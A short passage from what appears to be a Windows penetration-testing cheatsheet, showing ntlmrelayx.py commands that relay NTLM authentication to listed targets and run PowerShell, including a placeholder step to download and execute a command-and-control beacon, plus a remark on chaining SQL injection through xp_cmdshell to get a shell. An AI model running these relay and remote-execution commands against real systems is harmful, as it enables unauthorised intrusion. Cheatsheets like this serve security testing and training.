m0chan/m0chan.github.io/_posts/2019-07-30-Windows-Notes-and-Cheatsheet.md

 ntlmrelayx.py -tf targets.txt -c powershell.exe -Enc asdasdasdasd
 ntlmrelayx.py -tf targets.txt -c powershell.exe /c download and execute beacon... = RIP

-You could also couple this with SQLi but executing EXEC xp_cmdshell '' and relaying the response or pop a shell on the web server etc.
 ```